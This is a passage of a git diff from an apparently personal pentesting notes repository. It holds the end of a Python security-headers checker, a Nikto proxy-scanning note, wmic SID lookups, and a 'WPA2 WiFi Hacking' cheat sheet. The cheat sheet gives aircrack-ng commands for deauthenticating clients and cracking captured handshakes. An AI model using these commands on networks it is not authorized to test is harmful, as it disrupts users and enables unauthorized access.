f.write('{}'.format(resptext)) + f.write('```\n') + +################################ + +message = """ + _____ _ _ _ +/ ___| | | | | | | +\ `--. ___ ___ _ _ _ __ ___ | |_| | ___ __ _ __| | ___ _ __ ___ + `--. \/ _ \/ __| | | | '__/ _ \ | _ |/ _ \/ _` |/ _` |/ _ \ '__/ __| +/\__/ / __/ (__| |_| | | | __/ | | | | __/ (_| | (_| | __/ | \__ \\ +\____/ \___|\___|\__,_|_| \___| \_| |_/\___|\__,_|\__,_|\___|_| |__ / + + Headers Checker | @maldevel + Version: {} +""".format(__version__) + + +def MainFunc(): + parser = argparse.ArgumentParser(description=message, formatter_class=RawTextHelpFormatter) + + parser.add_argument("-H", "--host", + action="store", + metavar='hostname', + dest='host', + type=str, + default=None, + help='The host to check, e.g. http://example.com, https://example.com, http://192.168.1.1') + + parser.add_argument('-l', '--list', + action='store', + metavar='hostsfile', + dest='hostsfile', + type=str, + default=None, + help='Hosts list file path. Place each target host in new line.') + + parser.add_argument('-o', '--output', + action='store', + metavar='directory', + dest='output', + type=str, + default=None, + help='Output directory path') + + parser.add_argument('-x', '--proxy', + action="store", + metavar='PROXY', + dest='proxy', + type=str, + default=None, + required=False, + help='Use proxy (eg. http://127.0.0.1:8080).') + + parser.add_argument('-t', '--text', + action="store_true", + help='Print plain text results.') + + parser.add_argument('-r', '--request', + action="store_true", + help='Print request raw text.') + + parser.add_argument('-e', '--response', + action="store_true", + help='Print response raw text.') + + if len(sys.argv) is 1: + parser.print_help() + sys.exit(1) + + args = parser.parse_args() + + print message + + host = args.host + flist = args.hostsfile + + if host and flist: + print '[-] {}: Please specify one host only (-H) or a file list of hosts (-l).'.format(host) + sys.exit(1) + + proxies = { + 'http': args.proxy, + 'https': args.proxy, + } + + if host: + checkHosts([args.host], args.output, args.text, proxies, args.request, args.response) + elif flist: + hosts = [] + with open(flist, 'r') as f: + hosts = f.read().splitlines() + checkHosts(hosts, args.output, args.text, proxies, args.request, args.response) + + +if __name__ == '__main__': + try: + MainFunc() + except KeyboardInterrupt: + print "Interrupted by user.." + except: + sys.exit() diff --git a/web/lists/common-content-types.list b/web/lists/common-content-types.list index ff72756..a20d1b7 100644 --- a/web/lists/common-content-types.list +++ b/web/lists/common-content-types.list @@ -1,15 +1,15 @@ -application/javascript -application/json -application/x-www-form-urlencoded -application/pdf -application/xml -application/zip -audio/mpeg -audio/vorbis -multipart/form-data -text/css -text/html -text/plain -image/png -image/jpeg -image/gif +application/javascript +application/json +application/x-www-form-urlencoded +application/pdf +application/xml +application/zip +audio/mpeg +audio/vorbis +multipart/form-data +text/css +text/html +text/plain +image/png +image/jpeg +image/gif diff --git a/web/nikto.md b/web/nikto.md index d9318e3..e293f55 100644 --- a/web/nikto.md +++ b/web/nikto.md @@ -1,15 +1,15 @@ -## Nikto - -### Scanning an HTTPS target using a HTTP proxy - -* Edit nikto.conf - -``` -nano /etc/nikto.conf -``` - -* Change line ```LW_SSL_ENGINE=auto``` to ```LW_SSL_ENGINE=SSLeay``` - -``` -nikto -host example.com -port -ssl -output nikto_https_report.html -useproxy http://127.0.0.1:8080 -``` +## Nikto + +### Scanning an HTTPS target using a HTTP proxy + +* Edit nikto.conf + +``` +nano /etc/nikto.conf +``` + +* Change line ```LW_SSL_ENGINE=auto``` to ```LW_SSL_ENGINE=SSLeay``` + +``` +nikto -host example.com -port -ssl -output nikto_https_report.html -useproxy http://127.0.0.1:8080 +``` diff --git a/wifi/wifi.md b/wifi/wifi.md index b261f27..0cf12f2 100644 --- a/wifi/wifi.md +++ b/wifi/wifi.md @@ -1,11 +1,11 @@ -## WiFi Notes - -### Debian - -* Add a "non-free" component to /etc/apt/sources.list - -```bash -sudo apt-get install firmware-atheros -``` - -[ath9k_htc](https://wiki.debian.org/ath9k_htc) +## WiFi Notes + +### Debian + +* Add a "non-free" component to /etc/apt/sources.list + +```bash +sudo apt-get install firmware-atheros +``` + +[ath9k_htc](https://wiki.debian.org/ath9k_htc) diff --git a/wifi/wpa2.md b/wifi/wpa2.md index 4e5f135..649ffc3 100644 --- a/wifi/wpa2.md +++ b/wifi/wpa2.md @@ -1,40 +1,40 @@ -## WPA2 WiFi Hacking - -### Enable monitor mode on wireless interface - -**List wireless interfaces supporting monitor mode** - -```bash -airmon-ng -``` - -**Enable monitor mode** - -```bash -airmon-ng start wlan0 -``` - -### Scan for WiFi networks - -```bash -airodump-ng wlan0mon -``` - -### Packet Capture - -```bash -airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ wlan0mon -``` - -### Inject packets/Capture Handshake - -```bash -aireplay-ng -0 10 -a [router bssid] -c [client bssid] wlan0mon -``` - -### Cracking - -```bash -aircrack-ng -a2 -b [router bssid] -w /path/to/wordlist /root/Desktop/*.cap -``` - +## WPA2 WiFi Hacking + +### Enable monitor mode on wireless interface + +**List wireless interfaces supporting monitor mode** + +```bash +airmon-ng +``` + +**Enable monitor mode** + +```bash +airmon-ng start wlan0 +``` + +### Scan for WiFi networks + +```bash +airodump-ng wlan0mon +``` + +### Packet Capture + +```bash +airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ wlan0mon +``` + +### Inject packets/Capture Handshake + +```bash +aireplay-ng -0 10 -a [router bssid] -c [client bssid] wlan0mon +``` + +### Cracking + +```bash +aircrack-ng -a2 -b [router bssid] -w /path/to/wordlist /root/Desktop/*.cap +``` + diff --git a/windows/wmi.md b/windows/wmi.md index 920f028..d2ac477 100755 --- a/windows/wmi.md +++ b/windows/wmi.md @@ -1,39 +1,39 @@ -## Windows Management Instrumentation - -### Get SID of a local user - -``` -wmic useraccount where name='username' get sid -``` - - -### Get SID for current logged in user - -``` -wmic useraccount where name='%username%' get sid -``` - -### Get SID for current logged in domain user - -``` -whoami /user -``` - -### Get SID for the local administrator of the computer - -``` -wmic useraccount where (name='administrator' and domain='%computername%') get name,sid -``` - -### Get SID for the domain administrator - -``` -wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid -``` - -### Find username from a SID - -``` -wmic useraccount where sid='S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxx-xxxx' get name -``` - +## Windows Management Instrumentation + +### Get SID of a local user + +``` +wmic useraccount where name='username' get sid +``` + + +### Get SID for current logged in user + +``` +wmic useraccount where name='%username%' get sid +``` + +### Get SID for current logged in domain user + +``` +whoami /user +``` + +### Get SID for the local administrator of the computer + +``` +wmic useraccount where (name='administrator' and domain='%computername%') get name,sid +``` + +### Get SID for the domain administrator + +``` +wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid +``` + +### Find username from a SID + +``` +wmic useraccount where sid='S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxx-xxxx' get name +``` +